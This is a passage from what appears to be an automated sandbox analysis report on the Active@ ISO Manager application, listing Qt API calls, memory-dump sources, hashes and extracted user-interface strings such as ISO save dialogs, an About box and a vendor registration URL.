                                                                                                                  • ?connect@QObject@@SA?AVConnection@QMetaObject@@PEBV1@PEBD01W4ConnectionType@Qt@@@Z.QT5CORE ref: 00007FF653717C72
                                                                                                                  • ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE ref: 00007FF653717C7D
                                                                                                                    • Part of subcall function 00007FF653769FB8: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF653769FE8
                                                                                                                    • Part of subcall function 00007FF653769FB8: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF653769FEE
                                                                                                                  • ??0QTimer@@QEAA@PEAVQObject@@@Z.QT5CORE ref: 00007FF653717C99
                                                                                                                  • ??0QTimer@@QEAA@PEAVQObject@@@Z.QT5CORE ref: 00007FF653717CC6
                                                                                                                  • ?connect@QObject@@SA?AVConnection@QMetaObject@@PEBV1@PEBD01W4ConnectionType@Qt@@@Z.QT5CORE ref: 00007FF653717CF8
                                                                                                                  • ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE ref: 00007FF653717D03
                                                                                                                    • Part of subcall function 00007FF65371BDC0: ??0QObject@@QEAA@PEAV0@@Z.QT5CORE ref: 00007FF65371BDCD
                                                                                                                    • Part of subcall function 00007FF65371BDC0: ?sharedNull@QArrayData@@SAPEAU1@XZ.QT5CORE ref: 00007FF65371BDE1
                                                                                                                    • Part of subcall function 00007FF65371BDC0: ??0QString@@QEAA@XZ.QT5CORE ref: 00007FF65371BDEE
                                                                                                                    • Part of subcall function 00007FF65371BDC0: ??0QString@@QEAA@XZ.QT5CORE ref: 00007FF65371BDF8
                                                                                                                  • ?connect@QObject@@SA?AVConnection@QMetaObject@@PEBV1@PEBD01W4ConnectionType@Qt@@@Z.QT5CORE ref: 00007FF653717D4D
                                                                                                                  • ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE ref: 00007FF653717D58
                                                                                                                  • ?connect@QObject@@SA?AVConnection@QMetaObject@@PEBV1@PEBD01W4ConnectionType@Qt@@@Z.QT5CORE ref: 00007FF653717D84
                                                                                                                  • ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE ref: 00007FF653717D8F
                                                                                                                  • ?connect@QObject@@SA?AVConnection@QMetaObject@@PEBV1@PEBD01W4ConnectionType@Qt@@@Z.QT5CORE ref: 00007FF653717DBB
                                                                                                                  • ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE ref: 00007FF653717DC6
                                                                                                                  • ?connect@QObject@@SA?AVConnection@QMetaObject@@PEBV1@PEBD01W4ConnectionType@Qt@@@Z.QT5CORE ref: 00007FF653717DF2
                                                                                                                  • ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE ref: 00007FF653717DFD
                                                                                                                  • ?connect@QObject@@SA?AVConnection@QMetaObject@@PEBV1@PEBD01W4ConnectionType@Qt@@@Z.QT5CORE ref: 00007FF653717E29
                                                                                                                  • ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE ref: 00007FF653717E34
                                                                                                                  • ?connect@QObject@@SA?AVConnection@QMetaObject@@PEBV1@PEBD01W4ConnectionType@Qt@@@Z.QT5CORE ref: 00007FF653717E60
                                                                                                                  • ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE ref: 00007FF653717E6B
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Object@@$Widget@@$Connection@Meta$?set$Type@$String@@$Qt@@@$?connect@ConnectionWindow$Size$Flags@$?move@Point@@@Policy@@$Qt@@@@@$?resize@Object@@@$?fromName@String@@@Timer@@Tree$ArrayConcurrency::cancel_current_taskDialog@@Format@HeightHeight@Icon@@Item@@Label@@MaximumMinimumModality@ObjectPolicy@Size@Size@@Size@@@Stretch@TextUtf8@WidgetWidth@$?has?header?object?shared?sizeAbstractAscii_helper@Button@@ControlData@Data@@Hidden@HorizontalIcon@Icon@@@Item@Null@Policy@0@0Policy@@@Thread@@Type@0@@TypedV0@@Verticalmalloc
                                                                                                                  • String ID: 1emitErasing(int)$1eraseTimerTimeout()$1get_CD_DVD_devices_complette()$1needStopOperation()$1setProgressBarProc(int)$1setTitles(QString)$1writeIntoLogView(int, QString)$1write_complette(bool)$2emitErasing(int)$2get_CD_DVD_devices_complette()$2needStopOperation()$2setProgressBarProc(int)$2setTitles(QString)$2timeout()$2wIntoLogView(int, QString)$2write_complette(bool)
                                                                                                                  • API String ID: 4048668083-3776895011
                                                                                                                  • Opcode ID: 3a4e442e74676f4ffbb3f29e72eebd6cbb44636a0b68d88bf0e6b2f77f3d3c23
                                                                                                                  • Instruction ID: 00f72dc4101f6b90867753614dd92cad866cb5d1e1a7636299c2c8b39286563d
                                                                                                                  • Opcode Fuzzy Hash: 3a4e442e74676f4ffbb3f29e72eebd6cbb44636a0b68d88bf0e6b2f77f3d3c23
                                                                                                                  • Instruction Fuzzy Hash: 0B915032928B8296E710DF51F8551EAB366FB88F84F444136DA8EA3B64DF3CE149C744
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$Char@@@$?fromArrayAscii_helper@Data@Typed$?arg@Array@@ByteChar@@Latin1V0@$$V0@@$Settings@@Variant@@$?setString@@@Value@Variant@@@
                                                                                                                  • String ID: Update%1_Date$Update%1_Notes$Update%1_Setup$Update%1_Title$Update%1_Version$Updates
                                                                                                                  • API String ID: 2959591247-215325586
                                                                                                                  • Opcode ID: 36bdad670fd6e7a41fc2237d41a081d89beec6087c1ea581226a94d8379cca1c
                                                                                                                  • Instruction ID: f42cb7a3e7a69113fb7e93f357d7c4a20e4483b6244f88dc18b24a8da9b05f07
                                                                                                                  • Opcode Fuzzy Hash: 36bdad670fd6e7a41fc2237d41a081d89beec6087c1ea581226a94d8379cca1c
                                                                                                                  • Instruction Fuzzy Hash: 12812F22E24A1295F710CFA0E8965AC3731FB55F59F491131E94FB2A68DF3CD589C388
                                                                                                                  APIs
                                                                                                                  • ?currentIndex@QTabWidget@@QEBAHXZ.QT5WIDGETS(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF65372E206
                                                                                                                  • ?allocate@QArrayData@@SAPEAU1@_K00V?$QFlags@W4AllocationOption@QArrayData@@@@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF65372E288
                                                                                                                  • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF65372E2CC
                                                                                                                  • ??4QString@@QEAAAEAV0@AEBV0@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF65372E2E7
                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF65372E57B
                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF65372E591
                                                                                                                  • ?replace@QString@@QEAAAEAV1@AEBV1@0W4CaseSensitivity@Qt@@@Z.QT5CORE ref: 00007FF65372E5AD
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF65372E5B8
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF65372E5C3
                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF65372E5DA
                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF65372E5F0
                                                                                                                  • ?show@QWidget@@QEAAXXZ.QT5WIDGETS ref: 00007FF65372E62B
                                                                                                                  • ??4QString@@QEAAAEAV0@AEBV0@@Z.QT5CORE ref: 00007FF65372E64B
                                                                                                                  • ?start@QThread@@QEAAXW4Priority@1@@Z.QT5CORE ref: 00007FF65372E65D
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF65372E677
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$Array$?fromAscii_helper@Data@Typed$V0@@Widget@@$?allocate@?current?replace@?show@?start@AllocationCaseData@@Data@@@@@Flags@Index@Option@Priority@1@@Qt@@@Sensitivity@Thread@@U1@_V1@0
                                                                                                                  • String ID: Assembling ISO image...$ISO files (*.ISO)$Save ISO Image
                                                                                                                  • API String ID: 3098543177-3932332221
                                                                                                                  • Opcode ID: 5fd4bbb00b86ef5e8eafbb03f8953bd5c096aae523e3804c747a8291fa31ace8
                                                                                                                  • Instruction ID: 7a3b4ab7f3c129f770be75a63f58b31cec5d2f06e37d7897ea3bf2daefb88b4c
                                                                                                                  • Opcode Fuzzy Hash: 5fd4bbb00b86ef5e8eafbb03f8953bd5c096aae523e3804c747a8291fa31ace8
                                                                                                                  • Instruction Fuzzy Hash: E9D13F32E28A479AE700CF64E8D26A83762FB44F58F494531D90EB7A64DF3CE549D348
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  • <p style="margin-top:10px;margin-bottom:0px">Copyright (C) 1998-2024 LSoft Technologies Inc</p><p style="margin-top:0px;margin-bottom:0px"><a href="http://www.lsoft.net">www.LSOFT.net</a> All rights reserved.</p><p style = "margin-top:0px;margin-bottom:0px">&n, xrefs: 00007FF65372BDD7
                                                                                                                  • </h3><p style="margin-top:10px;margin-bottom:0px">Free License, xrefs: 00007FF65372BD6D
                                                                                                                  • </p>, xrefs: 00007FF65372BD09
                                                                                                                  • <h3>Active@ ISO Manager v&nbsp;, xrefs: 00007FF65372BD2C
                                                                                                                  • About, xrefs: 00007FF65372BCDA
                                                                                                                  • :/chookIsoManager/Resources/activeISO.png, xrefs: 00007FF65372BC8C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$?from$Box@@Message$?append@V1@@$?setArrayArray@@Ascii_helper@ByteData@TypedUtf8@V0@@$Pixmap@@String@@@$?exec@ConversionDialog@@Flag@Flags@IconImagePixmap@Pixmap@@@Qt@@@@@Text@Title@Widget@@@Window
                                                                                                                  • String ID: :/chookIsoManager/Resources/activeISO.png$</h3><p style="margin-top:10px;margin-bottom:0px">Free License$</p>$<h3>Active@ ISO Manager v&nbsp;$<p style="margin-top:10px;margin-bottom:0px">Copyright (C) 1998-2024 LSoft Technologies Inc</p><p style="margin-top:0px;margin-bottom:0px"><a href="http://www.lsoft.net">www.LSOFT.net</a> All rights reserved.</p><p style = "margin-top:0px;margin-bottom:0px">&n$About
                                                                                                                  • API String ID: 3557129421-1729690922
                                                                                                                  • Opcode ID: 2b8056280bdbcd093520c75c96c01c11e3bea6a9841ae7863723549612e91b6f
                                                                                                                  • Instruction ID: 22b90f6f6c271f3cbc15fbf84a7b6aeba333ca3305856c1806d68bb7efe22b15
                                                                                                                  • Opcode Fuzzy Hash: 2b8056280bdbcd093520c75c96c01c11e3bea6a9841ae7863723549612e91b6f
                                                                                                                  • Instruction Fuzzy Hash: 30518932A14A06EAFB00DFB4D8962AC2372FB55B49F851031D51EB69A8EF38D50DC385
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$Object@@$Char@@@Connection@MetaNetwork$?arg@?connect@Char@@ConnectionLatin1Qt@@@Type@$?text@AccessEdit@@LineManager@@Request@@Url@@$?from?get@?set?wizard@ArrayAscii_helper@Data@Mode@0@@Object@@@Page@@Parent@ParsingReply@@Request@@@TypedUrl@@@V1@@Widget@@WizardWizard@@malloc
                                                                                                                  • String ID: 1replyFinished(QNetworkReply*)$1slotError(QNetworkReply::NetworkError)$1slotReadyRead()$2error(QNetworkReply::NetworkError)$2finished(QNetworkReply*)$2readyRead()$http://lsoft.net/act/register.aspx?PID=%1&Email=%2&User=%3
                                                                                                                  • API String ID: 312537493-264019620
                                                                                                                  • Opcode ID: 9d5e0eae0534f3c03a8f2ca281a9ca8e42e5567be393a8fa57972108c464b1ef
                                                                                                                  • Instruction ID: a779606dd558ad5f85ad60dd68b6874682577abafd775d4b95c4ac110f47fca7
                                                                                                                  • Opcode Fuzzy Hash: 9d5e0eae0534f3c03a8f2ca281a9ca8e42e5567be393a8fa57972108c464b1ef
                                                                                                                  • Instruction Fuzzy Hash: FA712A22E24A0299FB10DFA0E8962A83372FB48F59F491135D90EB7A64EF3CD549C344
                                                                                                                  APIs
                                                                                                                  • ??0QString@@QEAA@XZ.QT5CORE ref: 00007FF653745C0E
                                                                                                                  • ?applicationDirPath@QCoreApplication@@SA?AVQString@@XZ.QT5CORE ref: 00007FF653745C19
                                                                                                                  • ?toNativeSeparators@QDir@@SA?AVQString@@AEBV2@@Z.QT5CORE ref: 00007FF653745C27
                                                                                                                    • Part of subcall function 00007FF653722A90: ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FF653722AAD
                                                                                                                    • Part of subcall function 00007FF653722A90: ?fromUtf8@QString@@SA?AV1@PEBDH@Z.QT5CORE ref: 00007FF653722AC9
                                                                                                                    • Part of subcall function 00007FF653722A90: ?append@QString@@QEAAAEAV1@AEBV1@@Z.QT5CORE ref: 00007FF653722AD6
                                                                                                                    • Part of subcall function 00007FF653722A90: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653722AE2
                                                                                                                  • ??4QString@@QEAAAEAV0@AEBV0@@Z.QT5CORE ref: 00007FF653745C48
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653745C52
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653745C5D
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653745C68
                                                                                                                  • ??0QString@@QEAA@XZ.QT5CORE ref: 00007FF653745C87
                                                                                                                  • ??0QString@@QEAA@XZ.QT5CORE ref: 00007FF653745C92
                                                                                                                    • Part of subcall function 00007FF6537457C0: ??4QString@@QEAAAEAV0@PEBD@Z.QT5CORE ref: 00007FF653745802
                                                                                                                    • Part of subcall function 00007FF6537457C0: ??4QString@@QEAAAEAV0@AEBV0@@Z.QT5CORE ref: 00007FF65374580E
                                                                                                                    • Part of subcall function 00007FF6537457C0: ?exists@QFile@@SA_NAEBVQString@@@Z.QT5CORE ref: 00007FF653745817
                                                                                                                    • Part of subcall function 00007FF6537457C0: ??0QFile@@QEAA@AEBVQString@@@Z.QT5CORE ref: 00007FF65374582C
                                                                                                                    • Part of subcall function 00007FF6537457C0: ?open@QFile@@UEAA_NV?$QFlags@W4OpenModeFlag@QIODevice@@@@@Z.QT5CORE ref: 00007FF65374583C
                                                                                                                    • Part of subcall function 00007FF6537457C0: ?atEnd@QFileDevice@@UEBA_NXZ.QT5CORE ref: 00007FF653745851
                                                                                                                    • Part of subcall function 00007FF6537457C0: ?readLine@QIODevice@@QEAA?AVQByteArray@@_J@Z.QT5CORE ref: 00007FF65374587F
                                                                                                                    • Part of subcall function 00007FF6537457C0: ??0QString@@QEAA@AEBVQByteArray@@@Z.QT5CORE ref: 00007FF65374588D
                                                                                                                    • Part of subcall function 00007FF6537457C0: ??1QByteArray@@QEAA@XZ.QT5CORE ref: 00007FF653745898
                                                                                                                    • Part of subcall function 00007FF6537457C0: ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF6537458AF
                                                                                                                    • Part of subcall function 00007FF6537457C0: ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF6537458D0
                                                                                                                    • Part of subcall function 00007FF6537457C0: ?replace@QString@@QEAAAEAV1@AEBV1@0W4CaseSensitivity@Qt@@@Z.QT5CORE ref: 00007FF6537458EC
                                                                                                                    • Part of subcall function 00007FF6537457C0: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF6537458F7
                                                                                                                    • Part of subcall function 00007FF6537457C0: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653745902
                                                                                                                    • Part of subcall function 00007FF6537457C0: ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF65374591D
                                                                                                                    • Part of subcall function 00007FF6537457C0: ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF65374593C
                                                                                                                  • ??4QString@@QEAAAEAV0@AEBV0@@Z.QT5CORE ref: 00007FF653745CE4
                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF653745CF6
                                                                                                                  • ?indexOf@QString@@QEBAHAEBV1@HW4CaseSensitivity@Qt@@@Z.QT5CORE ref: 00007FF653745D11
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653745D1D
                                                                                                                  • ?resize@QString@@QEAAXH@Z.QT5CORE ref: 00007FF653745D2A
                                                                                                                  • ??YQString@@QEAAAEAV0@PEBD@Z.QT5CORE ref: 00007FF653745D3B
                                                                                                                    • Part of subcall function 00007FF6537457C0: ?toLower@QString@@QEGBA?AV1@XZ.QT5CORE ref: 00007FF653745AE9
                                                                                                                    • Part of subcall function 00007FF6537457C0: ??8QString@@QEBA_NPEBD@Z.QT5CORE ref: 00007FF653745AFA
                                                                                                                    • Part of subcall function 00007FF6537457C0: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653745B07
                                                                                                                    • Part of subcall function 00007FF6537457C0: ?remove@QString@@QEAAAEAV1@HH@Z.QT5CORE ref: 00007FF653745B1B
                                                                                                                    • Part of subcall function 00007FF6537457C0: ??4QString@@QEAAAEAV0@AEBV0@@Z.QT5CORE ref: 00007FF653745B28
                                                                                                                    • Part of subcall function 00007FF6537457C0: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653745B35
                                                                                                                    • Part of subcall function 00007FF6537457C0: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653745B40
                                                                                                                    • Part of subcall function 00007FF6537457C0: ?atEnd@QFileDevice@@UEBA_NXZ.QT5CORE ref: 00007FF653745B4A
                                                                                                                    • Part of subcall function 00007FF6537457C0: ?close@QFileDevice@@UEAAXXZ.QT5CORE ref: 00007FF653745B63
                                                                                                                    • Part of subcall function 00007FF6537457C0: ??1QFile@@UEAA@XZ.QT5CORE ref: 00007FF653745BB4
                                                                                                                  • GetLogicalDrives.KERNEL32 ref: 00007FF653745D5C
                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF653745D9F
                                                                                                                  • ??0QChar@@QEAA@UQLatin1Char@@@Z.QT5CORE ref: 00007FF653745DAF
                                                                                                                  • ?arg@QString@@QEBA?AV1@DHVQChar@@@Z.QT5CORE ref: 00007FF653745DCF
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653745DEF
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653745DFA
                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF653745E1D
                                                                                                                  • ??0QChar@@QEAA@UQLatin1Char@@@Z.QT5CORE ref: 00007FF653745E2D
                                                                                                                  • ?arg@QString@@QEBA?AV1@DHVQChar@@@Z.QT5CORE ref: 00007FF653745E4A
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653745E6A
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653745E75
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653745E96
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653745EA1
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653745EAC
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653745EB7
                                                                                                                    • Part of subcall function 00007FF653744960: ??4QString@@QEAAAEAV0@PEBD@Z.QT5CORE ref: 00007FF6537449A6
                                                                                                                    • Part of subcall function 00007FF653744960: ?toLatin1@QString@@QEHAA?AVQByteArray@@XZ.QT5CORE ref: 00007FF6537449C9
                                                                                                                    • Part of subcall function 00007FF653744960: ?data@QByteArray@@QEAAPEADXZ.QT5CORE ref: 00007FF6537449D3
                                                                                                                    • Part of subcall function 00007FF653744960: ??1QByteArray@@QEAA@XZ.QT5CORE ref: 00007FF6537449F0
                                                                                                                    • Part of subcall function 00007FF653744960: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF6537449FC
                                                                                                                    • Part of subcall function 00007FF6537457C0: ?replace@QString@@QEAAAEAV1@AEBV1@0W4CaseSensitivity@Qt@@@Z.QT5CORE ref: 00007FF653745958
                                                                                                                    • Part of subcall function 00007FF6537457C0: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653745963
                                                                                                                    • Part of subcall function 00007FF6537457C0: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF65374596E
                                                                                                                    • Part of subcall function 00007FF6537457C0: ??4QString@@QEAAAEAV0@AEBV0@@Z.QT5CORE ref: 00007FF653745988
                                                                                                                    • Part of subcall function 00007FF6537457C0: ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FF653745996
                                                                                                                    • Part of subcall function 00007FF6537457C0: ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF6537459BC
                                                                                                                    • Part of subcall function 00007FF6537457C0: ?indexOf@QString@@QEBAHAEBV1@HW4CaseSensitivity@Qt@@@Z.QT5CORE ref: 00007FF6537459D7
                                                                                                                    • Part of subcall function 00007FF6537457C0: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF6537459E3
                                                                                                                    • Part of subcall function 00007FF6537457C0: ?resize@QString@@QEAAXH@Z.QT5CORE ref: 00007FF6537459F4
                                                                                                                    • Part of subcall function 00007FF6537457C0: ?toLower@QString@@QEGBA?AV1@XZ.QT5CORE ref: 00007FF653745A02
                                                                                                                    • Part of subcall function 00007FF6537457C0: ??8QString@@QEBA_NPEBD@Z.QT5CORE ref: 00007FF653745A13
                                                                                                                    • Part of subcall function 00007FF6537457C0: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653745A20
                                                                                                                    • Part of subcall function 00007FF6537457C0: ?remove@QString@@QEAAAEAV1@HH@Z.QT5CORE ref: 00007FF653745A34
                                                                                                                    • Part of subcall function 00007FF6537457C0: ??4QString@@QEAAAEAV0@AEBV0@@Z.QT5CORE ref: 00007FF653745A41
                                                                                                                    • Part of subcall function 00007FF6537457C0: ?toLower@QString@@QEGBA?AV1@XZ.QT5CORE ref: 00007FF653745A4F
                                                                                                                    • Part of subcall function 00007FF6537457C0: ??8QString@@QEBA_NPEBD@Z.QT5CORE ref: 00007FF653745A60
                                                                                                                    • Part of subcall function 00007FF6537457C0: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653745A6D
                                                                                                                    • Part of subcall function 00007FF6537457C0: ?remove@QString@@QEAAAEAV1@HH@Z.QT5CORE ref: 00007FF653745A81
                                                                                                                    • Part of subcall function 00007FF6537457C0: ??4QString@@QEAAAEAV0@AEBV0@@Z.QT5CORE ref: 00007FF653745A8E
                                                                                                                    • Part of subcall function 00007FF6537457C0: ?toLower@QString@@QEGBA?AV1@XZ.QT5CORE ref: 00007FF653745A9C
                                                                                                                    • Part of subcall function 00007FF6537457C0: ??8QString@@QEBA_NPEBD@Z.QT5CORE ref: 00007FF653745AAD
                                                                                                                    • Part of subcall function 00007FF6537457C0: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653745ABA
                                                                                                                    • Part of subcall function 00007FF6537457C0: ?remove@QString@@QEAAAEAV1@HH@Z.QT5CORE ref: 00007FF653745ACE
                                                                                                                    • Part of subcall function 00007FF6537457C0: ??4QString@@QEAAAEAV0@AEBV0@@Z.QT5CORE ref: 00007FF653745ADB
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
